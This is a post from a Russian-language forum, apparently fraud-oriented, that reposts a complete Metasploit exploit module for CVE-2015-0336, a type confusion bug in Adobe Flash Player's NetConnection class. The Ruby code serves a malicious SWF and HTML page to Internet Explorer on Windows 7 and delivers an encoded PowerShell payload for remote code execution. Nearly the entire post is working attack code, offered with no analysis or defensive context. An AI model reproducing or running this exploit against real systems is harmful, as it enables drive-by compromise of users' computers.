1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Adobe Flash Player NetConnection Type Confusion

Тема в разделе "Наши статьи", создана пользователем Favertes, 8 май 2015.

  1. TopicStarter Overlay
    Favertes

    Favertes

    Регистрация:
    14 апр 2015
    Сообщения:
    65
    Симпатии:
    27
    ##
    # This module requires Metasploit: Please login or register to view links
    # Current source: Please login or register to view links
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Powershell
    include Msf::Exploit::Remote::BrowserExploitServer

    def initialize(info={})
    super(update_info(info,
    'Name' => 'Adobe Flash Player NetConnection Type Confusion',
    'Description' => %q{
    This module exploits a type confusion vulnerability in the NetConnection class on
    Adobe Flash Player. When using a correct memory layout this vulnerability allows
    to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
    vectors, and finally accomplish remote code execution. This module has been tested
    successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
    'Unknown', # Exploit in the wild
    'juan vazquez' # msf module
    ],
    'References' =>
    [
    ['CVE', '2015-0336'],
    ['URL', 'Please login or register to view links,
    ['URL', 'Please login or register to view links,
    ['URL', 'Please login or register to view links,
    ['URL', 'Please login or register to view links,
    ['URL', 'Please login or register to view links
    ],
    'Payload' =>
    {
    'DisableNops' => true
    },
    'Platform' => 'win',
    'BrowserRequirements' =>
    {
    :source => /script|headers/i,
    :os_name => OperatingSystems::Match::WINDOWS_7,
    :ua_name => Msf::HttpClients::IE,
    :flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') },
    :arch => ARCH_X86
    },
    'Targets' =>
    [
    [ 'Automatic', {} ]
    ],
    'Privileged' => false,
    'DisclosureDate' => 'Mar 12 2015',
    'DefaultTarget' => 0))
    end

    def exploit
    @swf = create_swf
    @trigger = create_trigger
    super
    end

    def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
    print_status('Sending SWF...')
    send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
    return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
    end

    def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    trigger_hex_stream = @trigger.unpack('H*')[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="Please login or register to view links" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
    end

    def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
    end

    def create_trigger
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
    end
    end
    Source Please login or register to view links
     
    Метки:

Поделиться этой страницей

Загрузка...